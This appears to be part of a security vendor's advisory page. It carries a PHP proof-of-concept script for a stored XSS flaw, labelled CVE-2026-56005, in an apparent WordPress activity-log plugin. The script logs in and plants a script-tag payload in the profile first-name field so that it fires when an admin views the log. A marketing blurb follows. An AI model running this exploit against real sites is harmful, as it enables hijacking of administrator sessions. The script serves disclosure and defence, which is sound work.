curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);

// Step 2: Update user profile first_name with XSS payload
// Payload will be injected into the tooltip when hovering over activity log entries
$payload = '<script>alert("CVE-2026-56005 XSS")</script>';

$profile_url = $target_url . '/wp-admin/profile.php';
curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'first_name=' . urlencode($payload) . '&last_name=Test&nickname=test&email=' . urlencode($username . '@example.com') . '&user_login=' . urlencode($username) . '&from=profile&submit=Update+Profile');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_REFERER, $target_url . '/wp-admin/profile.php');
$response = curl_exec($ch);

// Step 3: Trigger an activity log event (e.g., post creation, login, etc.)
// This step is optional; the payload is already stored and will appear in any log viewer
// that displays user info for that user.

curl_close($ch);
echo "Payload injected. An admin viewing the activity log will see the XSS when hovering over user entries.";

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations